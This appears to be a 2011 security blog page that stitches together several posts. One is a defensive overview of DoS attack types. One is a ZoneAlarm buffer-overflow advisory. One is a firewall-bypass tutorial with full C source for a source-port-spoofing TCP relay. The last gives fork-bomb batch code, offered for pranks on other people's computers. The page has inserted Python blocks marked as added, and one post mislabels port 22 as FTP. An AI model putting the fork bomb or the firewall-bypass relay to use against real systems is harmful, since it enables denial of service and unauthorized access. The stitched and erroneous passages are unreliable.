Wednesday, 4 May 2011

Types of Attacks on Web Servers

Newspapers and Internet magazines ran cover stories when Denial of Service (DoS) attacks hit the websites of a number of large and very successful companies last year. Even those who claim to provide security tools were under attack. If Yahoo, Amazon, CNN and Microsoft fell victim to DoS attacks, can any site owner feel safe?

In this article we'll try to help site owners understand the ins and outs of DoS and DDoS attack methods, the vulnerabilities involved, and potential solutions to these problems. Webmasters are usually seen searching for solutions to new security threats and for ways of patching up before it is too late.

DoS:

In a Denial of Service (DoS) attack, the attacker sends a stream of requests to a service on the server machine in the hope of exhausting a resource such as memory or consuming all processor capacity.

DoS Attacks Involve:

* Jamming Networks
* Flooding Service Ports
* Misconfiguring Routers
* Flooding Mail Servers

DDoS:

In a Distributed DoS (DDoS) attack, a hacker installs an agent or daemon on numerous hosts. The hacker sends a command to the master, which resides on any one of the many hosts. The master communicates with the agents residing on the other servers to commence the attack. DDoS attacks are harder to combat because blocking a single IP address or network will not stop them. The traffic can come from hundreds or even thousands of individual systems, and sometimes the users are not even aware that their computers are part of the attack.

DDoS Attacks Involve:

* FTP Bounce Attacks
* Port Scanning Attack
* Ping Flooding Attack
* Smurf Attack
* SYN Flooding Attack
* IP Fragmentation/Overlapping Fragment Attack
* IP Sequence Prediction Attack
* DNS Cache Poisoning
* SNMP Attack
* Send Mail Attack

Some of the more popular attack methods are described below.
_________________________________________________________________________________

FTP Bounce Attack

FTP (File Transfer Protocol) is used to transfer documents and data, often anonymously, from a local machine to a server and vice versa. All administrators of FTP servers should understand how this attack works. The FTP bounce attack is used to slip past application-based firewalls.

In a bounce attack, the hacker uploads a file to the FTP server and then requests that this file be sent to an internal server. The file can contain malicious software or a simple script that occupies the internal server and uses up all of its memory and CPU resources.

To avoid these attacks, the FTP daemon on the Web servers should be updated regularly. The site's FTP area should be monitored regularly to check whether any unknown file has been transferred to the Web server. Firewalls also help by filtering content and commands. Some firewalls block certain file extensions, a technique that can help block the upload of malicious software.
_________________________________________________________________________________

Port Scanning Attack

A port scan is when someone uses software to systematically scan the entry points on another person's machine. There are legitimate uses for this software in managing a network.

Most hackers enter another's computer to leave unidentifiable harassing messages, capture passwords or change the set-up configuration. The defense against this is consistent network monitoring. There are free tools that monitor for port scans and related activity.
_________________________________________________________________________________

Ping Flooding Attack

Pinging involves one computer sending a signal to another computer and expecting a response back. Responsible use of pinging provides information on the availability of a particular service. Ping flooding is the extreme of sending thousands or millions of pings per second. Ping flooding can cripple a system or even shut down an entire site.

A Ping Flooding Attack floods the victim's network or machine with IP ping packets. At least 18 operating systems are vulnerable to this attack, but the majority can be patched. There are also numerous routers and printers that are vulnerable. Patches cannot currently be applied throughout a global network easily.
_________________________________________________________________________________

Smurf Attack

A Smurf Attack is a modification of the "ping attack": instead of sending pings directly to the attacked system, they are sent to a broadcast address with the victim's return address. A range of IP addresses from the intermediate system will then send pings to the victim, bombarding the victim machine or system with hundreds or thousands of pings.

One solution is to prevent the Web server's network from being used as a broadcast amplifier. Routers must be configured to deny IP-directed broadcasts from other networks into the network. Another helpful measure is to configure the router to block IP spoofing from the network to be protected. Routers configured as such will block any packets that do not originate in the network. To be effective, this must be done on all routers on the network.
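The two router measures just described (deny inbound directed broadcasts, block spoofed sources on both sides) as a small Python model added here; this is not code from the original article, and the protected networks and interface names are constructed for illustration:

```python
import ipaddress

# Constructed topology (not from the original article): the networks this
# router protects, i.e. the ones a Smurf attacker would use as amplifiers.
INSIDE_NETS = [ipaddress.ip_network("192.0.2.0/24"),
               ipaddress.ip_network("203.0.113.0/25")]


def _is_inside(addr):
    return any(addr in net for net in INSIDE_NETS)


def is_directed_broadcast(dst, ingress):
    """A packet arriving on the outside interface whose destination is the
    broadcast address of a protected network: the Smurf amplification trigger."""
    d = ipaddress.ip_address(dst)
    return ingress == "outside" and any(d == n.broadcast_address for n in INSIDE_NETS)


def is_spoofed(src, ingress):
    """Anti-spoofing on both interfaces: hosts inside may only send from inside
    addresses, and nothing arriving from outside may claim an inside address."""
    s = ipaddress.ip_address(src)
    return _is_inside(s) != (ingress == "inside")


def filter_packet(src, dst, ingress):
    """Router decision for one packet: 'forward' or a drop reason."""
    if ingress not in ("inside", "outside"):
        raise ValueError("unknown interface: " + ingress)
    if is_spoofed(src, ingress):
        return "drop: spoofed source"
    if is_directed_broadcast(dst, ingress):
        return "drop: directed broadcast"
    return "forward"
```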
_________________________________________________________________________________

SYN Flooding Attack

This attack exploits a vulnerability in the TCP/IP communications protocol. It keeps the victim machine responding to a non-existent system. The victim is sent packets and asked to respond to a system or machine with an incorrect IP address. As it responds, it is flooded with the requests. The requests wait for a response until the packets begin to time out and are dropped. During the waiting period, the victim system is consumed by the requests and cannot respond to legitimate ones.

When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN ACK (synchronize acknowledge) response. The destination host must then hear an acknowledgement, or ACK packet, of the SYN ACK before the connection is established. This is referred to as the "TCP three-way handshake".

Decreasing the time-out waiting period for the three-way handshake can help reduce the risk of SYN flooding attacks, as will increasing the size of the connection queue (the SYN ACK queue). Applying service packs to upgrade older operating systems is also a good countermeasure. More recent operating systems are resistant to these attacks.
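A SYN flood shows up on the victim as a pile of half-open connections in the SYN-received state, many of them from addresses that never complete the handshake. The following Python is an added example, not from the original article: it parses a constructed netstat-style snapshot and flags a port whose half-open count passes a threshold (the threshold and sample lines are illustrative assumptions).

```python
from collections import Counter

# Constructed `netstat -ant`-style snapshot (not a real capture): port 80 is
# holding several half-open connections from different addresses.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.0.2.10:80           198.51.100.5:51233      ESTABLISHED
tcp        0      0 192.0.2.10:80           203.0.113.9:40001       SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.17:40002      SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.33:40003      SYN_RECV
tcp        0      0 192.0.2.10:80           203.0.113.41:40004      SYN_RECV
tcp        0      0 192.0.2.10:443          198.51.100.6:51777      ESTABLISHED
tcp        0      0 192.0.2.10:22           198.51.100.7:51900      SYN_RECV
"""


def parse_states(text):
    """Yield (local_port, remote_ip, state) for each TCP line of the snapshot."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp"):
            continue
        local, foreign, state = parts[3], parts[4], parts[5]
        yield int(local.rsplit(":", 1)[1]), foreign.rsplit(":", 1)[0], state


def half_open_report(text, threshold=3):
    """Per local port: half-open (SYN_RECV) count, established count, number of
    distinct remote addresses among the half-open ones, and an alert flag.
    The threshold is illustrative; a real backlog holds hundreds of entries."""
    half_open, established, sources = Counter(), Counter(), {}
    for lport, rip, state in parse_states(text):
        if state == "SYN_RECV":
            half_open[lport] += 1
            sources.setdefault(lport, set()).add(rip)
        elif state == "ESTABLISHED":
            established[lport] += 1
    return {
        port: {
            "half_open": half_open[port],
            "established": established[port],
            "distinct_sources": len(sources[port]),
            "alert": half_open[port] >= threshold,
        }
        for port in half_open
    }
```

A high half-open count spread over many distinct sources that never reach ESTABLISHED is the pattern the text describes, since the spoofed "non-existent" systems never send the final ACK.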

_________________________________________________________________________________

IP Fragmentation/Overlapping Fragment Attack

To facilitate IP transmission over comparatively congested networks, IP packets can be reduced in size or broken into smaller packets. By making the packets very small, routers and intrusion detection systems cannot identify the packets' contents and will let them pass through without any examination. When a packet is reassembled at the other end, it overflows the buffer. The machine will hang, reboot or may exhibit no effect at all.

In an Overlapping Fragment Attack, the reassembled packet starts in the middle of another packet. As the operating system receives these invalid packets, it allocates memory to hold them. This eventually uses all the memory resources and causes the machine to reboot or hang.
_________________________________________________________________________________

IP Sequence Prediction Attack

Using the SYN Flood method, a hacker can establish a connection with a victim machine and obtain the IP packet sequence number in an IP Sequence Prediction Attack. With this number, the hacker can control the victim machine and fool it into believing it is communicating with another network machine. The victim machine will then provide the requested services. Most operating systems now randomize their sequence numbers to reduce the possibility of prediction.

_________________________________________________________________________________

DNS Cache Poisoning

DNS provides distributed host information used for mapping domain names to IP addresses. To improve performance, the DNS server caches the most recent data for quick retrieval. This cache can be attacked and the information spoofed to redirect a network connection or block access to Web sites, a devious tactic called DNS cache poisoning.

The best defense against problems such as DNS cache poisoning is to run the latest version of the DNS software for the operating system in use. New versions track pending queries and serialize them to help prevent spoofing.
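The "track pending queries" defense in Python, as an added example that is not the page's or any real DNS server's code: a reply is cached only if it matches a query still outstanding (same random transaction ID, same name, from the server that was asked), and the first valid reply closes the query so a later forged one has nothing to match. Real resolvers additionally randomize the source port; that is omitted here.

```python
import secrets


class StubResolver:
    """Constructed model of a resolver cache (not the page's DNS software).
    A reply is accepted only if it answers a query that is still pending:
    same transaction ID, same name and sent by the server that was asked."""

    def __init__(self):
        self.pending = {}   # txid -> (qname, server asked)
        self.cache = {}     # qname -> answer

    def send_query(self, qname, server):
        """Register a query under a random 16-bit ID and return that ID."""
        txid = secrets.randbelow(1 << 16)
        while txid in self.pending:          # avoid reusing an ID still in flight
            txid = secrets.randbelow(1 << 16)
        self.pending[txid] = (qname, server)
        return txid

    def receive(self, txid, qname, answer, from_server):
        """Handle one reply; returns 'cached' or the reason it was rejected."""
        expected = self.pending.get(txid)
        if expected is None:
            return "rejected: no pending query with this ID"
        if expected != (qname, from_server):
            return "rejected: name or server does not match the query"
        del self.pending[txid]               # first valid reply closes the query
        self.cache[qname] = answer
        return "cached"
```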

_________________________________________________________________________________

SNMP Attack

Most network devices support SNMP, and it is active by default. An SNMP attack can result in the network being mapped, and traffic can be monitored and redirected.

The best defense against this attack is upgrading to SNMPv3, which encrypts passwords and messages. Since SNMP resides on almost all network devices (routers, hubs, switches, servers and printers), the task of upgrading is huge. Some vendors now offer an SNMP management tool that includes upgrade distribution for global networks.

_________________________________________________________________________________

UDP Flood Attack

A UDP Flood Attack links two unsuspecting systems. By spoofing, the UDP flood hooks up one system's UDP service (which for testing purposes generates a series of characters for each packet it receives) with another system's UDP echo service (which echoes any character it receives, in an attempt to test network programs). As a result, a non-stop flood of useless data passes between the two systems.

_________________________________________________________________________________

Send Mail Attack

In this attack, hundreds of thousands of messages are sent in a short period of time; a normal load might only be 100 or 1000 messages per hour. Attacks against Send Mail might not make the front page, but downtime on major websites will.

For companies whose reputation depends on the reliability and accuracy of their Web-based transactions, a DoS attack can be a major embarrassment and a serious threat to business.

_________________________________________________________________________________

Conclusion

Frequent denial-of-service attacks and a change in strategy by "black-hat hackers" are prompting enterprises to demand technology that proactively blocks malicious traffic.

Tools and services that reflect approaches to combating such DoS attacks have been introduced over time. These are normally upgrades to what was produced before. No solution can be called the ultimate defense against DoS attacks. Despite new technology arriving every day, the attacks are likely to continue.

ZoneAlarm Flaw Opens Firewalls To E-mail Attack

Got this from the net... nice though.

Zone Labs has alerted users that several versions of its personal firewall products are vulnerable to a buffer overflow attack conducted via e-mail that could leave supposedly protected systems open to malicious code assaults, the company said.

The affected editions include the 4.0 versions of ZoneAlarm, ZoneAlarm Plus, and ZoneAlarm Pro; ZoneAlarm Pro 4.5; and Zone Labs Integrity Client 4.0 and 4.5.

"If successfully exploited, a skilled attacker could cause the firewall to stop processing traffic, execute arbitrary code, or elevate malicious code's privileges," ZoneAlarm said Wednesday in the alert posted on its Web site.

The vulnerability, which was first reported by eEye Digital Security, is caused by an unchecked buffer in Simple Mail Transfer Protocol (SMTP) processing, which could in turn lead to a buffer overflow, said ZoneAlarm. To exploit the vulnerability remotely, the target system must be operating as an SMTP server.

"Zone Labs does not recommend using our client security products to protect servers," the company said. Zone Labs also sells a server-specific firewall under its Integrity line.

ZoneAlarm users were urged to update their software to version 4.5.538.001, while Integrity Client 4.0 and 4.5 users should upgrade to versions 4.0.146.046 and 4.5.085, respectively. More details on the vulnerability and upgrade instructions can be found on the Zone Labs Web site.

Exploiting buggy/weak firewalls

In this tutorial we'll be looking at a new way (at least for me) to bypass weak firewalls.

A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set of rules and is frequently used to protect networks from unauthorized access while permitting legitimate communications to pass. (Wikipedia)

In basic language: a firewall contains a list of basic rules and signatures, such as packet filters. It checks the network traffic for content that can be malicious or potentially harmful to the machine.

Firewalls are implemented to secure parts of the network from hackers or other malicious users. However, if a firewall is poorly written or implemented, it will make exploitation easier rather than harder. To demonstrate how these can be exploited, I'll take up a scenario.

Scenario

Most of the buggy firewalls out there carry out packet filtering by relying on the packet data, which is not to be trusted, since the sender controls it.

Let's take an example: there is a system with one of these buggy firewalls, and it is protecting SSH, SMB, etc. Other services like FTP and HTTP are not filtered, as they are readily used by its clients.

Now the job is to send requests with the source port set to 22 (FTP) and the destination port set to the service we want to access (SMB, port 445). This would bypass the firewall, leading to easy exploitation.
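To show why a filter that trusts the source port is weak, here is an added Python model (not from the original post) of the stateless rule the scenario describes beside a filter keyed on destination port and connection state; the port sets and the flow-table design are assumptions made for the scenario:

```python
# Constructed model of the scenario (not from the original post).
PROTECTED_PORTS = {22, 445}          # SSH and SMB, which the firewall should shield
OFFERED_PORTS = {21, 80}             # FTP and HTTP, open to clients
TRUSTED_SOURCE_PORTS = {20, 21, 80}  # source ports the buggy filter "trusts"


def buggy_allow(sport, dport, syn):
    """Stateless rule that consults the source port. The sender picks that
    value freely, so a SYN to a protected port passes if it claims an FTP or
    HTTP source port."""
    if sport in TRUSTED_SOURCE_PORTS:
        return True
    return dport not in PROTECTED_PORTS


class StatefulFilter:
    """Decisions keyed on the destination service and on connection state; the
    source port is never used as evidence of trust."""

    def __init__(self):
        self.flows = set()   # (local_port, remote_port) pairs currently allowed

    def outbound(self, lport, rport):
        """Record a connection opened from inside so its replies are admitted."""
        self.flows.add((lport, rport))

    def inbound_allow(self, sport, dport, syn):
        if syn:
            # A new inbound connection is admitted only to an offered service.
            if dport in OFFERED_PORTS:
                self.flows.add((dport, sport))
                return True
            return False
        # Any other inbound packet must belong to a flow already in the table.
        return (dport, sport) in self.flows
```

The same forged packet (source port 21, destination 445, SYN set) passes the buggy rule and is refused by the stateful one, while genuine FTP replies to a connection the host opened itself are still admitted.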

Tool that can be used (Kev proxy):

Code:
/*
 * kev proxy
 * it's not big, but then, it's not that clever either.
 *
 * compile with cc -o kp kp.c -lpthread
 * tested on Red Hat 8, should work on most Linux
 *
 * kp listen_port target_ip target_port <source_port> <v>
 *
 * kp will listen on the listen_port and relay bi-directional data
 * between this port and the target_port on the target_ip.
 * The optional source_port is to set the source port on the outbound
 * connection to the target_ip.  Useful for getting around ACLs in
 * routers and firewalls.
 * 'v' indicates verbose mode for extra info.
 *
 * Note: it does not operate as a 'real' HTTP proxy, although it can
 * proxy HTTP as well as any other TCP protocol; just don't let your
 * browser know it's talking to a proxy ;) (unless, of course, you're
 * proxying for an HTTP proxy!)
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <netdb.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>      /* atoi(), exit() */
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>


int listen_port, target_port, source_port, verbose;
char target_ip[1024];

void * kp(void *);

void die(int sig)
{
    pthread_exit(NULL);
}

void usage()
{
    printf("kp listen_port target_ip target_port <source_port> <v>\n");
}

int getMax(int q1, int q2)
{
    if (q1 > q2) return q1; else return q2;
}

int main(int argc, char **argv)
{
    int fd, fd1;
    const int on = 1;
    struct sockaddr_in fd_sock, fd_sock1;
    socklen_t listenlen;
    pthread_t ptConnection;

    (void) signal (SIGINT, die);

    verbose = 0;
    source_port = 0;

    if ((argc < 4) || (argc > 6))
    {
        usage();
        exit(1);
    }

    printf("kevproxy\n");

    listen_port = atoi(argv[1]);
    target_port = atoi(argv[3]);
    if (argc > 4) {
        if (strcmp(argv[4], "v") == 0)
        {
            if (argc > 5)
            {
                usage();
                exit(1);
            }
            verbose = 1;
            source_port = 0;
        } else {
            source_port = atoi(argv[4]);
            if (argc > 5)
            {
                if (strcmp(argv[5], "v") == 0)
                {
                    verbose = 1;
                } else {
                    usage();
                    exit(1);
                }
            }
        }
    } else {
        source_port = 0;
    }

    /* bounded copy: argv[2] is user input and must not overflow target_ip */
    snprintf(target_ip, sizeof target_ip, "%s", argv[2]);

    printf("Listening on %d, sending to %s:%d", listen_port, target_ip, target_port);
    if (source_port != 0) {
        printf(", source port %d\n", source_port);
    } else {
        printf("\n");
    }

    // fd_sock is listener
    fd_sock.sin_family = AF_INET;
    fd_sock.sin_port = htons(listen_port);
    fd_sock.sin_addr.s_addr = INADDR_ANY;

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd <0) {
        perror("fd: opening stream socket");
        return -1;
    }
    if (verbose) printf("socket fd made\n");

    if (setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) != 0)
    {
        perror("fd: setsockopt failed");
    }
    if (verbose) printf("socket fd option set\n");

    if (bind(fd, (struct sockaddr *)&fd_sock, sizeof fd_sock) <0)
    {
        return 0;
    }
    if (verbose) printf("Bound fd!\n");

    if (listen(fd, 1024) < 0)
    {
        return 0;
    }
    if (verbose) printf("fd: listening!\n");

    for (;;)
    {
        // fd_sock1 is the accepted conx; accept() fills it in
        memset(&fd_sock1, 0, sizeof fd_sock1);
    
        listenlen = sizeof fd_sock1;
        fd1 = accept(fd, (struct sockaddr *)&fd_sock1, &listenlen);

        if (fd1 < 0)
        {
            return 0;
        }
        if (verbose) printf("fd1: accepted!\n");

        if (pthread_create (&ptConnection, NULL, kp, &fd1) != 0)
        {
            perror("could not create thread");
            return 0;
        }
        if (verbose) printf("thread created\n");

        if ( (pthread_detach(ptConnection)) != 0)
        {
            perror("could not detach thread");
        }
        if (verbose) printf("thread detached\n");
    }
}

void closesocks(int sock1, int sock2)
{
    while (close(sock1) != 0);
    if (verbose) printf("sock1 closed\n");
    while (close(sock2) != 0);
    if (verbose) printf("sock2 closed\n");
}

void * kp(void *fd_in)
{
    fd_set socks;
    int selectret;
    int maxsock;
    int accfd, fd2;
    int num;
    char buff[65100];
    struct sockaddr_in fd_sock2, fd_sock3;

    accfd = * (int *) fd_in;

    if (verbose) printf("accfd = %d\n", accfd);

        // fd_sock2 is local port of outbound conx
    fd_sock2.sin_family = AF_INET;
    fd_sock2.sin_port = htons(source_port);
    fd_sock2.sin_addr.s_addr = INADDR_ANY;

    // fd_sock3 is outbound conx
    fd_sock3.sin_addr.s_addr=inet_addr(target_ip);
    fd_sock3.sin_port = htons(target_port);
    fd_sock3.sin_family = AF_INET;

    fd2 = socket(AF_INET, SOCK_STREAM, 0);
    if (fd2 <0) {
        perror("fd2: opening stream socket");
        return NULL;
    }
    if (verbose) printf("socket fd2 made\n");

    if (source_port != 0) {
        if (bind(fd2, (struct sockaddr *)&fd_sock2, sizeof fd_sock2) < 0)
        {
            perror("fd2: bind failed");
        } else {
            if (verbose) printf("Bound fd2!\n");
        }
    }

    if (connect(fd2, (struct sockaddr *)&fd_sock3, sizeof fd_sock3) < 0)
    {
        perror("fd2: connect");
        return  NULL;
    }
    if (verbose) printf("Connected fd2!\n");

    maxsock = getMax(accfd, fd2);

    while (1) {
        //printf(".");
        // select() modifies the set, so it must be cleared and rebuilt
        // on every iteration; without FD_ZERO the set starts uninitialised
        FD_ZERO (&socks);
        FD_SET (accfd, &socks);
        FD_SET (fd2, &socks);

        selectret = select (maxsock+1, &socks, NULL, NULL, NULL);
        if (selectret == -1)
        {
            perror("select failed");
            break;
        }

        if (FD_ISSET (accfd, &socks))
        {
            num = read(accfd, buff, 65000);
            if (num <=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(fd2, buff, num) != num)
            {
                perror("fd2 write error");
            }
            if (verbose) printf("accfd -> fd2, %d bytes\n", num);
        }

        if (FD_ISSET (fd2, &socks))
        {
            num = read(fd2, buff, 65100);
            if (num <=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(accfd, buff, num) != num)
            {
                perror("accfd write error");
            }
            if (verbose) printf("fd2 -> accfd, %d bytes\n", num);
        }

    }
    if (verbose) printf("thread exiting\n");
    pthread_exit(NULL);
    return NULL;
}

Thanks for viewing, and I hope the viewers like it!!

How to make a Fork Bomb (rabbit virus)?

Introduction

Hey guys, haven't posted on here for a while, been honing my skills. And I've got a new thing for all you guys to have fun with; it's very easy and fun to do. Before we start coding I'll explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application, for example cmd.exe, so many times that it overloads the computer's processor, which results in the computer either overheating, shutting down or, in some cases, a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one, you cannot stop a fork bomb unless you are extremely 1337, so once it starts it goes until it does its job.

Most anti-virus software will not pick up a fork bomb or rabbit virus; as far as it is concerned, it is just a batch file that opens an application.

Background

Fork bombs, aka rabbit viruses, have been around for ages due to their effectiveness at evading anti-virus software. I came across it when I wanted to play a practical joke on my school's administrator for his birthday. Just to let you know, it worked, and he's not some n00b. I find them very effective; just don't bomb yourself.

The code

OK, this is the code that you type into notepad.exe. Remember to save it as a .bat, or if you want it in a dormant form, save it as a .txt.

One more thing... I am not responsible if you kill your computer or somebody else's computer, with or without permission. Now that we have that out of the way, here we go...

Code: .bat
:s
START %0
GOTO :s

Have fun guys